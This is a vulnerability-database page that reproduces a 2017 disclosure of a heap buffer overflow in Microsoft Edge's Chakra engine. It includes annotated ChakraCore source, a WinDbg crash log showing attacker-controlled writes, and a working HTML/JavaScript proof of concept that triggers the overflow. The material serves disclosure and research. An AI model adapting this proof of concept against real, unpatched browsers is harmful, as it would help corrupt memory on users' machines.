Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Edge Chakra Heap Buffer Overflow

🗓️ 20 Aug 2017 00:00:00Reported by He XiaoxiaoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 82 Views

Microsoft Edge Chakra Heap Buffer Overflow issue by Huang Anwen and He Xiaoxia

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Edge Chakra EmitNew Integer Overflow Exploit
17 Aug 201700:00
zdt
0day.today		Microsoft Edge Chakra - Heap Buffer Overflow Exploit
18 Aug 201700:00
zdt
0day.today		Microsoft Edge Chakra - NULL Pointer Dereference Exploit
18 Aug 201700:00
zdt
0day.today		Microsoft Edge Chakra - Buffer Overflow Exploit
18 Aug 201700:00
zdt
Circl		CVE-2017-8636
17 Aug 201700:00
circl
CNVD		Microsoft Windows Internet Explorer and Edge JavaScript Engine Remote Code Execution Vulnerability
9 Aug 201700:00
cnvd
Check Point Advisories		Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-8636)
28 Aug 201700:00
checkpoint_advisories
CVE		CVE-2017-8636
8 Aug 201721:00
cve
Cvelist		CVE-2017-8636
8 Aug 201721:00
cvelist
Microsoft KB		August 8, 2017—KB4034658 (OS Build 14393.1593)
8 Aug 201707:00
mskb
Rows per page
`<!--  
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team  
  
This is the HEAP BASED OVERFLOW version of the issue.  
  
// ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp  
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)  
{  
  
[...]  
  
if (!isAsmJs && executeFunction->IsCoroutine())  
{  
[...]  
}  
else  
{  
InterpreterStackFrame::Setup setup(function, args);  
size_t varAllocCount = setup.GetAllocationVarCount();  
//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);  
size_t varSizeInBytes = varAllocCount * sizeof(Var);  
  
//  
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.  
//  
DWORD_PTR stackAddr;  
  
// If the locals area exceeds a certain limit, allocate it from a private arena rather than  
// this frame. The current limit is based on an old assert on the number of locals we would allow here.  
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!  
{  
ArenaAllocator *tmpAlloc = nullptr;  
fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);  
allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);  
stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)  
}  
else  
{  
PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);  
allocation = (Var*)_alloca(varSizeInBytes);  
#if DBG  
memset(allocation, 0xFE, varSizeInBytes);  
#endif  
stackAddr = reinterpret_cast<DWORD_PTR>(allocation);  
}  
  
[...]  
return aReturn;  
}  
  
  
  
  
  
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64  
Copyright (c) Microsoft Corporation. All rights reserved.  
  
*** wait with pending attach  
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols  
Executable search path is:   
ModLoad: 00007ff7`49700000 00007ff7`49725000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  
ModLoad: 00007ffa`13700000 00007ffa`138db000 C:\Windows\SYSTEM32\ntdll.dll  
ModLoad: 00007ffa`119f0000 00007ffa`11a9e000 C:\Windows\System32\KERNEL32.DLL  
ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000 C:\Windows\System32\KERNELBASE.dll  
ModLoad: 00007ffa`0e140000 00007ffa`0e1be000 C:\Windows\SYSTEM32\apphelp.dll  
ModLoad: 00007ffa`11b80000 00007ffa`11e79000 C:\Windows\System32\combase.dll  
ModLoad: 00007ffa`103f0000 00007ffa`104e6000 C:\Windows\System32\ucrtbase.dll  
ModLoad: 00007ffa`11160000 00007ffa`11285000 C:\Windows\System32\RPCRT4.dll  
ModLoad: 00007ffa`104f0000 00007ffa`1055a000 C:\Windows\System32\bcryptPrimitives.dll  
ModLoad: 00007ffa`11630000 00007ffa`116cd000 C:\Windows\System32\msvcrt.dll  
ModLoad: 00007ffa`0a400000 00007ffa`0a460000 C:\Windows\SYSTEM32\wincorlib.DLL  
ModLoad: 00007ffa`10c90000 00007ffa`10d50000 C:\Windows\System32\OLEAUT32.dll  
ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000 C:\Windows\System32\msvcp_win.dll  
ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000 C:\Windows\System32\kernel.appcore.dll  
ModLoad: 00007ff9`f3680000 00007ff9`f3a44000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll  
ModLoad: 00007ffa`10560000 00007ffa`10c52000 C:\Windows\System32\Windows.Storage.dll  
ModLoad: 00007ffa`11940000 00007ffa`119e1000 C:\Windows\System32\advapi32.dll  
ModLoad: 00007ffa`11b20000 00007ffa`11b79000 C:\Windows\System32\sechost.dll  
ModLoad: 00007ffa`113e0000 00007ffa`11431000 C:\Windows\System32\shlwapi.dll  
ModLoad: 00007ffa`10c60000 00007ffa`10c87000 C:\Windows\System32\GDI32.dll  
ModLoad: 00007ffa`10200000 00007ffa`10388000 C:\Windows\System32\gdi32full.dll  
ModLoad: 00007ffa`10d60000 00007ffa`10eaa000 C:\Windows\System32\USER32.dll  
ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000 C:\Windows\System32\win32u.dll  
ModLoad: 00007ffa`11790000 00007ffa`1183a000 C:\Windows\System32\shcore.dll  
ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000 C:\Windows\System32\powrprof.dll  
ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000 C:\Windows\System32\profapi.dll  
ModLoad: 00007ffa`08380000 00007ffa`08606000 C:\Windows\SYSTEM32\iertutil.dll  
ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000 C:\Windows\SYSTEM32\ntmarta.dll  
ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000 C:\Windows\SYSTEM32\USERENV.dll  
ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000 C:\Windows\SYSTEM32\clipc.dll  
ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000 C:\Windows\SYSTEM32\DNSAPI.dll  
ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000 C:\Windows\SYSTEM32\cryptsp.dll  
ModLoad: 00007ffa`115b0000 00007ffa`1161c000 C:\Windows\System32\WS2_32.dll  
ModLoad: 00007ffa`10d50000 00007ffa`10d58000 C:\Windows\System32\NSI.dll  
ModLoad: 00007ffa`11730000 00007ffa`1175d000 C:\Windows\System32\IMM32.DLL  
ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000 C:\Windows\SYSTEM32\IPHLPAPI.DLL  
ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000 C:\Windows\SYSTEM32\twinapi.appcore.dll  
ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000 C:\Windows\SYSTEM32\bcrypt.dll  
ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000 C:\Windows\SYSTEM32\profext.dll  
ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000 C:\Windows\SYSTEM32\msiso.dll  
ModLoad: 00007ffa`054d0000 00007ffa`054f2000 C:\Windows\SYSTEM32\EShims.dll  
ModLoad: 00007ffa`045d0000 00007ffa`045eb000 C:\Windows\SYSTEM32\MPR.dll  
ModLoad: 00007ffa`11290000 00007ffa`113d5000 C:\Windows\System32\ole32.dll  
ModLoad: 00007ffa`0e370000 00007ffa`0e405000 C:\Windows\system32\uxtheme.dll  
ModLoad: 00007ff9`f1650000 00007ff9`f2d01000 C:\Windows\SYSTEM32\edgehtml.dll  
ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000 C:\Windows\SYSTEM32\wintypes.dll  
ModLoad: 00007ff9`f0e60000 00007ff9`f164b000 C:\Windows\SYSTEM32\chakra.dll  
ModLoad: 00007ffa`04630000 00007ffa`0466f000 C:\Windows\SYSTEM32\MLANG.dll  
ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000 C:\Windows\SYSTEM32\policymanager.dll  
ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000 C:\Windows\SYSTEM32\msvcp110_win.dll  
ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000 C:\Windows\SYSTEM32\PROPSYS.dll  
ModLoad: 00007ffa`04d30000 00007ffa`04dfb000 C:\Windows\System32\ieproxy.dll  
ModLoad: 00007ffa`09f90000 00007ffa`0a096000 C:\Windows\System32\Windows.UI.dll  
ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000 C:\Windows\SYSTEM32\TextInputFramework.dll  
ModLoad: 00007ffa`0b640000 00007ffa`0b912000 C:\Windows\SYSTEM32\CoreUIComponents.dll  
ModLoad: 00007ffa`0da10000 00007ffa`0daf3000 C:\Windows\SYSTEM32\CoreMessaging.dll  
ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000 C:\Windows\SYSTEM32\usermgrcli.dll  
ModLoad: 00007ffa`0abe0000 00007ffa`0b111000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll  
ModLoad: 00007ffa`11e80000 00007ffa`132b7000 C:\Windows\System32\shell32.dll  
ModLoad: 00007ffa`101b0000 00007ffa`101f9000 C:\Windows\System32\cfgmgr32.dll  
ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000 C:\Windows\SYSTEM32\dwmapi.dll  
ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000 C:\Windows\SYSTEM32\WININET.dll  
ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000 C:\Windows\SYSTEM32\SspiCli.dll  
ModLoad: 00007ffa`11440000 00007ffa`115a6000 C:\Windows\System32\msctf.dll  
ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000 C:\Windows\SYSTEM32\mrmcorer.dll  
ModLoad: 00007ff9`fddf0000 00007ff9`fde00000 C:\Windows\SYSTEM32\tokenbinding.dll  
ModLoad: 00007ffa`00260000 00007ffa`0027b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll  
ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000 C:\Windows\SYSTEM32\Bcp47Langs.dll  
ModLoad: 00007ffa`07430000 00007ffa`07507000 C:\Windows\SYSTEM32\winhttp.dll  
ModLoad: 00007ffa`0f420000 00007ffa`0f47c000 C:\Windows\system32\mswsock.dll  
ModLoad: 00007ffa`0a730000 00007ffa`0a73b000 C:\Windows\SYSTEM32\WINNSI.DLL  
ModLoad: 00007ffa`07260000 00007ffa`07428000 C:\Windows\SYSTEM32\urlmon.dll  
ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000 C:\Windows\SYSTEM32\CRYPTBASE.DLL  
ModLoad: 00007ff9`fe760000 00007ff9`fe77a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll  
ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000 C:\Windows\SYSTEM32\ieapfltr.dll  
ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000 C:\Windows\System32\rmclient.dll  
ModLoad: 00007ff9`fd750000 00007ff9`fd768000 C:\Windows\System32\UiaManager.dll  
ModLoad: 00007ff9`fb720000 00007ff9`fb767000 C:\Windows\system32\dataexchange.dll  
ModLoad: 00007ffa`0d180000 00007ffa`0d45f000 C:\Windows\SYSTEM32\d3d11.dll  
ModLoad: 00007ffa`0db30000 00007ffa`0dc52000 C:\Windows\SYSTEM32\dcomp.dll  
ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000 C:\Windows\SYSTEM32\dxgi.dll  
ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000 C:\Windows\system32\twinapi.dll  
ModLoad: 00007ffa`060c0000 00007ffa`060e8000 C:\Windows\SYSTEM32\srpapi.dll  
ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000 C:\Windows\System32\CRYPT32.dll  
ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000 C:\Windows\System32\MSASN1.dll  
ModLoad: 00007ff9`f8480000 00007ff9`f84fa000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll  
ModLoad: 00007ff9`ff120000 00007ff9`ff17d000 C:\Windows\SYSTEM32\ninput.dll  
ModLoad: 00007ffa`0d460000 00007ffa`0da04000 C:\Windows\SYSTEM32\d2d1.dll  
ModLoad: 00007ffa`06cf0000 00007ffa`06faf000 C:\Windows\SYSTEM32\DWrite.dll  
ModLoad: 00007ff9`f8060000 00007ff9`f80ba000 C:\Windows\System32\Windows.Graphics.dll  
ModLoad: 00007ffa`06950000 00007ffa`0695f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll  
ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000 C:\Windows\SYSTEM32\vm3dum64.dll  
ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000 C:\Windows\SYSTEM32\D3D10Level9.dll  
ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000 C:\Windows\System32\oleacc.dll  
ModLoad: 00007ffa`06480000 00007ffa`06490000 C:\Windows\system32\msimtf.dll  
ModLoad: 00007ffa`06ab0000 00007ffa`06b38000 C:\Windows\system32\directmanipulation.dll  
ModLoad: 00007ff9`fe370000 00007ff9`fe411000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll  
ModLoad: 00007ffa`06760000 00007ffa`06774000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll  
ModLoad: 00007ffa`05a10000 00007ffa`05a48000 C:\Windows\System32\smartscreenps.dll  
ModLoad: 00007ffa`06b40000 00007ffa`06cc8000 C:\Windows\SYSTEM32\windows.globalization.dll  
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)  
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:  
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????  
0:016> r  
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0  
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0  
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10  
r8=0000015e3d500030 r9=0000015e2c538000 r10=000000388f1fb918  
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120  
r14=0000000000000000 r15=0000015e4063f9b3  
iopl=0 nv up ei pl nz ac pe nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210  
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:  
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????  
0:016> dq ecx  
0000015e`3d5401b0 00000000`00000000 00010000`42424242  
0000015e`3d5401c0 00010000`42424242 00010000`42424242  
0000015e`3d5401d0 00010000`42424242 00010000`42424242  
0000015e`3d5401e0 00010000`42424242 00010000`42424242  
0000015e`3d5401f0 00010000`42424242 00010000`42424242  
0000015e`3d540200 00010000`42424242 00010000`42424242  
0000015e`3d540210 00010000`42424242 00010000`42424242  
0000015e`3d540220 00010000`42424242 00010000`42424242  
  
0:016> dq [ecx+edx*8]  
0000015e`3d550000 ????????`???????? ????????`????????  
0000015e`3d550010 ????????`???????? ????????`????????  
0000015e`3d550020 ????????`???????? ????????`????????  
0000015e`3d550030 ????????`???????? ????????`????????  
0000015e`3d550040 ????????`???????? ????????`????????  
0000015e`3d550050 ????????`???????? ????????`????????  
0000015e`3d550060 ????????`???????? ????????`????????  
0000015e`3d550070 ????????`???????? ????????`????????  
0:016> !address ecx  
  
  
Failed to map Heaps (error 8007001e)  
Usage: <unclassified>  
Allocation Base: 0000015e`3d500000  
Base Address: 0000015e`3d500000  
End Address: 0000015e`3d550000  
Region Size: 00000000`00050000  
Type: 00020000 MEM_PRIVATE  
State: 00001000 MEM_COMMIT  
Protect: 00000004 PAGE_READWRITE  
  
0:016> !address 0000015e`3d550000  
Usage: Free  
Base Address: 0000015e`3d550000  
End Address: 0000015e`3d7f0000  
Region Size: 00000000`002a0000  
Type: 00000000   
State: 00010000 MEM_FREE  
Protect: 00000001 PAGE_NOACCESS  
  
0:016> kb  
RetAddr : Args to Child : Call Site  
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d  
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd  
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1  
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac  
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51  
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba  
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77  
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a  
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8  
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d  
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93  
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83  
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114  
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c  
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250  
00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c  
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac  
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51  
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2  
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93  
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83  
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100  
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b  
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a  
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124  
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5  
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436  
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1  
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119  
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202  
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357  
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f  
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d  
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204  
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1  
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f  
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63  
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3  
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d  
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23  
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b  
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236  
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70  
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3  
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53  
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125  
00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280  
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f  
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee  
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab  
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48  
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14  
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21  
  
-->  
<html>  
<head>  
<title> POC </title>  
</head>  
<script>  
  
var a=[];   
a.length=0xffff-1;   
a.fill('0x42424242');  
  
var s='{';   
for(var i=0; i<0x8000-1; i++){  
s+= 'a'+i+':0,'  
};   
s+= 'b:0';  
s+= '}';  
  
var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')';   
eval(c);  
  
</script>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Aug 2017 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.81659
microsoftedgechakraheap buffer overflowhuang anwenhe xiaoxiaointerpreterstackframescriptfunctionargumentreaderchakracoredebuggersymbol search pathamd64
82